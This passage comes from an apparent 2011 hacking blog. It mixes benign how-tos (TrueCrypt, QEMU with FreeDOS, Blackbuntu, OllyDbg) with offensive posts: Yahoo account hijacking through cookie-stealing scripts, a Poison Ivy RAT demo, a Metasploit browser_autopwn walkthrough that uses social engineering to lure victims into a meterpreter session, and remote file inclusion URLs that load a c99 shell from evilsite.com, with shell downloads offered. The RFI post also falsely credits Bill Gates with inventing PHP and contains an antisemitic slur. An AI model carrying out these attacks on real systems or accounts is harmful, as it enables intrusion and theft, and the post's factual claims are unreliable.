
the password again and click OK). If the password is correct, the volume will be mounted.

Final Step:

We have just successfully mounted the container as a virtual disk M:

The virtual disk is entirely encrypted (including file names, allocation tables, free space, etc.) and

behaves like a real disk. You can save (or copy, move, etc.) files to this virtual disk and they will be

encrypted on the fly as they are being written.

If you open a file stored on a TrueCrypt volume, for example, in media player, the file will be

automatically decrypted to RAM (memory) on-the-fly while it is being read.

Important: Note that when you open a file stored on a TrueCrypt volume (or when you write/copy a

file to/from the TrueCrypt volume) you will not be asked to enter the password again. You need to

enter the correct password only when mounting the volume.

You can open the mounted volume, for example, by double-clicking the item marked with a red

rectangle in the screenshot above.

You can also browse to the mounted volume the way you normally browse to any other types of

volumes. For example, by opening the 'Computer' (or 'My Computer') list and double clicking the

corresponding drive letter (in this case, it is the letter M).

You can copy files (or folders) to and from the TrueCrypt volume just as you would copy them to any

normal disk (for example, by simple drag-and-drop operations). Files that are being read or copied

from the encrypted TrueCrypt volume are automatically decrypted on the fly in memory/RAM.

Similarly, files that are being written or copied to the encrypted TrueCrypt volume are automatically

encrypted on the fly (right before they are written to the disk) in RAM.

Note that TrueCrypt never saves any decrypted data to a disk – it only stores them temporarily in

RAM (memory). Even when the volume is mounted, data stored in the volume is still encrypted. When

you restart Windows or turn off your computer, the volume will be dismounted and all files stored on

it will be inaccessible (and encrypted). Even when power supply is suddenly interrupted (without

proper system shut down), all files stored on the volume will be inaccessible (and encrypted). To

make them accessible again, you have to mount the volume. To do so, repeat Steps 13-18.

If you want to close the volume and make files stored on it inaccessible, either restart your operating

system or dismount the volume. To do so, follow these steps:

Select the volume from the list of mounted volumes in the main TrueCrypt window (marked with a red

rectangle in the screenshot above) and then click Dismount (also marked with a red rectangle in

the screenshot above). To make files stored on the volume accessible again, you will have to mount

the volume. To do so, repeat Steps 13-18.

Downloads:

Trucrypt for win7,mac,linux

Installing Qemu in Fedora and Running FreeDOS guest.

2011-08-08T10:21:00.000-07:00

Introduction

QEMU is a well-known emulator that supports ARM platforms, and can be used to run the Fedora-ARM distribution. This provides a convenient platform to try out the distribution as well as to development and customization.

The howto describes a process to get the Fedora-ARM distribution running under QEMU. Although we have tested this on Fedora 12, most of the process should work on any other Linux system as well. We assumes that you can run commands as root (or using sudo) whenever necessary.

The QEMU system is set up to get its root file system from a local loopback block device or over NFS from the host system (requires networking between the host system and the QEMU guest). The host's networking can then be configured to get its IP address using DHCP.

Using QEMU with libvirt

libvirt is a virtualization management framework and toolkit. At the tool level, it provides the virsh virtualization shell as well as the virt-manager GUI tool for command-line VM management (plus additional tools).

By using libvirt to manage ARM VMs, you can leverage it's capabilities (such as domain autostart, network setup with NAT and DHCP, and console disconnect/reconnect), and manage your ARM and x86 VMs in a consistent manner.

Here is a quick-start guide to setting up ARM QEMU emulation under libvirt management:

Installing and starting the virtualization software

These steps install libvirt and related tools, if not installed already, plus the ARM emulator, and then start the libvirt daemon:

yum groupinstall virtualization

yum install qemu-system-arm

service libvirtd start

Running FreeDOS Guest:

1.1. Booting FreeDOS

Step 1: Getting the disk image. The contents of the emulated hard disk is stored in a file. When the guest system accesses the hard disk, the data is stored and retrieved from the file. Download the disk image containing a FreeDOS installation from the following link.

[host]$ wget https://sites.google.com/site/computerarchitects/my-files/freedos.qcow2?attredirects=0&d=1

Step 2: Booting the disk image. Start Qemu by specifying the FreeDOS disk image using the -

hda option.

[host]$ qemu -hda freedos.qcow2

Step 3: Switching between host and guest. When the guest window is clicked, Qemu enters the "Grab mode". In Grab mode, all keystrokes are sent to the guest. To exit Grab mode, and give back control to the host press and release the Ctrl-Alt key combination.

Step 4: Shutting down the guest. After using the guest, the guest can shutdown like a normal system, by issuing the OS' own shutdown command. In the case of FreeDOS issue the halt command.

C:\> halt

1.2. Installing FreeDOS

Step 1: Creating the disk image. The disk image into which FreeDOS will be installed is created first. A 100MB disk image should be sufficient for the FreeDOS installation. The qcow2 format will beused, because of its size advantages. Create the disk image using the qemu-img command. The create sub-command is to create hard disk images. The format is specified using the -f qcow2 option. The hard disk image file to be created is specified as the first argument. The hard disk image size is specified as the second argument.

[host]$ qemu-img create -f qcow2 hd.qcow2 100M

Step 2: Get the FreeDOS installation CD. Download the FreeDOS installation CD available from

[host]$ wget https://sites.google.com/site/computerarchitects/my-files/fdbasecd.iso?attredirects=0&d=1

Step 3: Boot the FreeDOS installation CD. The guest is booted from the FreeDOS installation CD and the installer installs FreeDOS on to the hard disk. Start Qemu by specifying the hard disk image - hard disk and CD-ROM, the CD-ROM drive is specified as the boot media using -boot d option. In the boot option, the hard disk is represented using the drive letter c and the CD-ROM is represented using the drive letter d.

[host]$ qemu -hda hd.qcow2 -cdrom fdbasecd.iso -boot d

1. In the installation CD boot prompt, press Enter to continue booting the installer.

2. In the installer menu select Install to harddisk using FreeDOS SETUP, and press

Enter.

3. Select the language and keyboard layout as English (US).

Step 4: Partition the hard disk. The created hard disk image is like a blank hard disk, and does not

contain partitions. Atleast one partition has to be created to install the OS.

1. Select Prepare the harddisk for FreeDOS by running XFdisk, to start the partitioner.

2. Select the un-partitioned free space, and press Enter, to open the Options menu.

3. From the Options menu, select New Partition and press Enter.

4. From the New Partition sub-menu, select Primary Partition and press Enter.

5. Specify the partition size as 100 and press Enter, to create a partition of size 100MB.

6. Select YES in the Initialise Partition Area dialog box, to format the created partition.

7. Select YES in the Initialise Partition Area dialog box, that appears again. For some

reason unknown to the author, this is asked twice.

8. Press F3 to quit the partitioner.

9. Select YES in the Write Partition Table dialog box, to write the partition table to disk.

10.Select YES in the Restart Computer dialog box. If after selecting the option the guest does

not restart. Close Qemu, and restart Qemu with same command as before.

11.When the system boots back, follow the 3 instructions in step 3, to reach the installer menu.

12.Select Continue with FreeDOS installation, to resume the installer.

Step 5: Install FreeDOS

1. Select Start installation of FreeDOS, to start the installation.

2. Make sure you read the copyright notice and press any key.

3. The installer prompts for the OS install path with C:\FDOS as default. Press Enter to accept

the default.

4. The installer prompts for the programs to be installed. Check/uncheck programs as required

using the Space key. Press Enter when done.

5. The installer installs the OS and the selected programs.

6. Enter Y when asked if the system can be rebooted. If the guest does not restart, close the Qemu

window, and invoke Qemu by specifying the hard disk image alone.

[host]$ qemu -hda hd.qcow2

1.5. Saving and Restoring Guest State

Step 1: Boot FreeDOS. First boot into the guest system, using the steps described in section

Section 1.3, “Booting FreeDOS”.

Step 2: Save the guest state. The current state of the guest system can be saved using the savevm

command in the monitor interface.

1. Switch to the monitor interface by pressing Ctrl-Alt-2.

2. Save the guest state using the savevm command, with the tag booted.

(qemu) savevm booted

Step 3: Restore the guest state. The guest state can be restored using the loadvm monitor

command.

1. Switch back to the console using Ctrl-Alt-1.

2. Make some changes to the filesystem by creating files.

C:\> echo hello > file.txt

3. Go back to the monitor interface and restore the guest state using the loadvm command.

(qemu) loadvm booted

4. Go back to the console and check for the file file.txt.

Step 4: Start from saved guest state.

1. Shutdown the guest system using the halt command.

2. Start the guest system using the saved guest state, by specifying the -loadvm option to qemu.

The option accepts the tag as argument.

[host]$ qemu -hda hd.qcow2 -loadvm booted

Hacking Yahoo Account using Remote Cookie Stealing

2011-08-07T14:31:00.000-07:00

Hello Friends, to be more Clear with our tutorials we have planned to put up slides and videos as much as we can. So, enjoy the hack on the video.

Downloads:
cookie stealing scripts
Slides

Poison Ivy RAT in Vmware XP

2011-08-07T09:44:00.000-07:00

Poison Ivy is one of the best Remote Administration Tool like Prorat.In this tutorial we use the RAT in a Vmware image of Windows XP . The video is a demo of using Poison Ivy in your localhost.

And the scenario is

1.No Antivirus

2.Windows XP in Vmware image

Crypting the trojan and bypassing Antivirus to attack remote computer will be posted soon.

Downloads:

poison-ivy

Blackbuntu

2011-08-06T06:59:00.001-07:00

Blackbuntu is a Linux distribution for penetration testing which is specially designed for training security students and practitioners of information security. It is currently built on Ubuntu 10.10 with the Gnome desktop environment. Blackbuntu will also include the KDE desktop in the final release of Blackbuntu Community Edition 0.3. It is not included in 0.1, 0.2 or the current 0.3 betas.

Blackbuntu features the following upstream components: Ubuntu 10.10, Linux 2.6.39 and Gnome 2.32.0
System requirements

1GHz x86 processor
768 MB of system memory (RAM)
10 GB of disk space for installation
Graphics card capable of 800×600 resolution
DVD-ROM drive or USB port

Community Edition 0.3 Final
For Blackbuntu 0.3 we are supporting both x86 and x86_64 architectures. You can download the Blackbuntu Community Edition 0.3 ISO DVD with the following link:
ISO Image(Torrent)
Blackbuntu Community Edition 0.3 x86 torrent
Blackbuntu Community Edition 0.3 x86_64 torrent
VMWARE (Torrent)
Blackbuntu Community Edition 0.3 x86 torrent
Blackbuntu Community Edition 0.3 x86_64 torrent
Virtual Box Image(Torrent)
Blackbuntu Community Edition 0.3 x86 torrent
Blackbuntu Community Edition 0.3 x86_64 torrent

Community Edition 0.2
You can download the Blackbuntu Community Edition 0.2 ISO CD with the following link:
http://blackbuntu.sourceforge.net

Name: bbuntu-ce-0.2.iso

MD5: cb7557ec2f71197e4bab6dd48235c6f2

Mirror

Thailand: http://www.stephack.com/bbuntu-ce-0.2.iso

Community Edition 0.1
You can download the Blackbuntu Community Edition 0.1 ISO CD with the following link:
http://blackbuntu.sourceforge.net

Name: bbuntu-ce-0.1.iso

MD5: 4e84db9bc21e5b469a5721ca3d2d6244

Penetrating Beyond a NAT device With metasploit.

2011-08-06T06:37:00.000-07:00

Hello Guys, hope You all would have now acquired a good knowledge about metasploit and meterpreter from the earlier posts. In the former posts all the hacks demonstrated are confined to the same network. But this time we are going to penetrate beyond a NAT device like a Router. That is hacking a PC in another network. For this Hack demo I have created the following Scenario.

The Scenario is as Follows the Victim is,

1. Not patched

2. No AV

3. Behind a NAT

An in depth look at the image will give a good understanding of the scenario and I hope the scenario is self explainable. So Now, the issue is How are we going to make a connection with the victim and exploit him. Fireup msfconsole and the follow the following steps.

The Strategy is

1. Use Browser Based exploits in Metapsloit, run a server hosting all exploit modules.

msf> use auxiliary/server/browser_autopwn

msf auxiliary ( browser_autopwn)> show options

Have a glance at the list of options

Set the LHOST, URIPATH, PORT the victim has to connect back, which Is typically the attackers IP and PORT numbers.

msf auxiliary ( browser_autopwn)> set LHOST 192.168.1.12

msf auxiliary ( browser_autopwn)>set URIPATH /

msf auxiliary ( browser_autopwn)>set PORT 80

msf auxiliary ( browser_autopwn)> run

All the modules will get loaded up and it will show the server has started with some number of exploits.

Now,

2. Send the link of the server to the victim through any social engineering technique.

3. Make the victim click on the link.

4. Kudos, You will see a meterpreter session opened up, Thats it With a brief knowledge of post exploitation techniques in meterpreter it is going to be an awesome exploiting session.

5. Use sessions –l, sessions –i to migrate to that session.

The following Screenshot shows a meterpreter session opened up.

In the next Tutorial, I will explain about how to hack into a patched and protected PC beyond NAT. Till then , have a Good Day.

Remote File Inclusion basics

2011-08-05T13:32:00.000-07:00

RFI Basics (remote file inclusion)

Basically, the include function in PHP allows contents from local or remote files to be pretty much "copied and pasted" and executed in a script at runtime.

Now suppose your girl friend wants a small website. All she wants is three pages.
A blog page where she can update you on how cute her puppy is.
A contact page with his email on it so people can flirt with her.
An gallery page where she can show the pictures of her puppies.

she creates four pages. blog.php, contact.php and gallery.php along with index.php, this is our "main" page that will contain a header, a side bar for navigation, some php and a footer.

You would view the pages on his website like this.
Code:
http://www.mygf.com/index.php?page=blog.php
http://www.mygf.com/index.php?page=contact.php
http://www.mygf.com/index.php?page=gallery.php
Let's take a look at the code for index.php

Code:
//html for header
//html for menu
$page = $_GET['page'];
include($page);
?>
//html for footer
On line 2, $page is set to $_GET['page']

This means when we go to
Code:
http://www.mygf.com/index.php?page=blog.php
$page is set to blog.php.
On line 3 it is "included". The contents from blog.php is copied and pasted into index.php

What's wrong with this? Well as I said earlier the include function can also include remote files. Files NOT on his web server.

Say we change "blog.php" to "http://www.google.com"
Code:
http://www.mygf.com/index.php?page=http://www.google.com
You would see the google home page instead of your girl frnds shitty blog.

What's the point of this?

We can include "bad" or "evil" scripts. Some of you may heard of "shells" (r57,c99,g00nshell,peanut). Shells are scripts with functions like letting you view directories of the server it's executed on, deleting files, viewing files, letting you run system commands and more.

Here's how we would use it:
Code:
http://www.mygf.com/index.php?page=http://evilsite.com/c99.txt
* We have to use the shell as .txt so it's plaintext. If we used .php then the script would be executed on http://www.evilsite.com.

Let's look at another example of a RFI.

Undefined variables.

Say your girlfriend has learned how to use MySQL and to put content on his blog page he uses a form he created to connect to his MySQL server and insert his stories into a table.

To connect to the MySQL server & add content he needs a username & a password. He stores these in a file called "db_details.php".

The blog.php file needs these credentials to connect and get the content.

so in index.php:
Code:
//html for header
//html for menu
$database_config_file = "db_details.php";
$page = $_GET['page'];
include($page);
?>
//html for footer
and in blog.php:

Code:
include($database_config_file);
//code to connect to MySQL and get the latest blog posts
?>
Since we are calling blog.php through index.php like this:
Code:
http://www.mygf.com/index.php?page=blog.php
, in index.php $database_config_file is set to "db_details.php" and in blog.php it is included. There is no problem there, it then can connect to the MySQL server with the credentials and retrieve his blog content.

But, if we went to blog.php directly:
Code:
http://www.mygf.com/blog.php
then $database_config_file is not set to anything. It still includes it but it is including nothing. Since we did not use index.php to access it, we did not get: $database_config_file = "db_details.php";

This is a problem, since we can set it ourselves.
If we go to
Code:
http://www.mygf.com/blog.php?database_config_file=http://evilsite.com/c99.txt
$database_config_file will be set to http://www.evilsite.com/c99.txt

Again, blog.php does not check if what it is including is valid.

...

As the famous inventor of PHP, Bill Gates says: There is more than one way to do it.

There are a few ways to prevent these vulnerabilities.

Yo' girl frnd thinks he has gotten smart and has put in a method to stop little let hackers like you.
This one is easily bypassed.
index.php:

Code:
$page = $_GET['page'];
include($page . ".php");
?>
This means when we go to index.php?page=home it will actually include home.php.

OMG, dat means it wont include my .txt, it will try to include .txt.php Sad.

Not necessarily. If we put a question mark after the ".txt" then anything that index.php puts after $page will go to the remote script we are including.

Like this:
Code:
http://www.mygf.com/index.php?page=http://evilsite.com/c99.txt
Index.php would try and include :
Code:
http://www.evilsite.com/c99.txt?.php
To prevent the problem with variables not being defined. Just make sure you define every variable that gets used.

There are a few other ways to prevent these vulnerabilities involving cleaning the input, checking if files exist etc but since I'm only typing with my big jew nose right now I can't be bothered going through them so I'm going to just do the most practical;

Switching.

Code:
$page = $_GET['page'];
switch($page){
case "blog":
include("blog.php");
break;
case "contact":
include("contact.php");
break;
case "gallery":
include("gallery.php");
break;
default: //A page wasn't chosen, or one that wasn't "home" or "gallery"
echo "Choose a page from our fine selection!1!!";
break;
}
?>

You can download the various evil scripts called as Shells from the below link:

Download Shells

Olly dbg 2.01, Alpha 4 released

2011-08-04T07:16:00.000-07:00

New Features in Alpha 4:

- Patch manager, similar to 1.10
- Shortcut editor, supports weird things like Ctrl+Win+$ etc. Now you can customize and share your shortcuts. I haven't tested it on Win7, please report any found bugs and incompatibilities!
- Instant .udd file loading. In the previous versions I've postponed analysis, respectivcely reading of the .udd file till the moment when all external links are resolved. But sometimes it took plenty of time, module started execution and was unable to break on the breakpoints placed in the DLL initialization routine
- Automatic search for the SFX entry point, very raw and works only with several packers. Should be significantly more reliable than 1.10. If you tried it on some SFX and OllyDbg was unable to find real entry, please send me, if possible, the link or executable for analysis!
- "Go to" dialog lists of matching names in all modules
- Logging breakpoints can protocol multiple expressions. Here is an example: I ask OllyDbg to protocol the contents of EAX, EBX and 4 memory doublewords starting at address ESP. Expressions must be separated by commas, repeat count has form SIZE*N, N=1..32:

ROOTRULERZ.COM

2011-08-01T16:04:00.000-07:00

Hi to all Regular Readers of "asianblackhats".This is a formal notification to inform you all that the blog address is changed to "www.rootrulerz.com".And don't be panicked if you are redirected to this domain,because it is the first step of renovation process to reach the goal of dedicated servers.And soon we will be posting more basics on Hacking for Newbies from the scratch and Expert level hacking.Keep on reading.Cheers!!!

-regards

Khan & Dayal

Meterpreter e-book

2011-08-01T08:43:00.000-07:00

If Metasploit is an Ocean Then I believe that meterpreter and its post exploitation techniques is the flora and fauna in it. This is one of the Good e-books I have found explaining the various meterpreter post exploitation commands and techniques in it. Hope You will all find it useful.

Download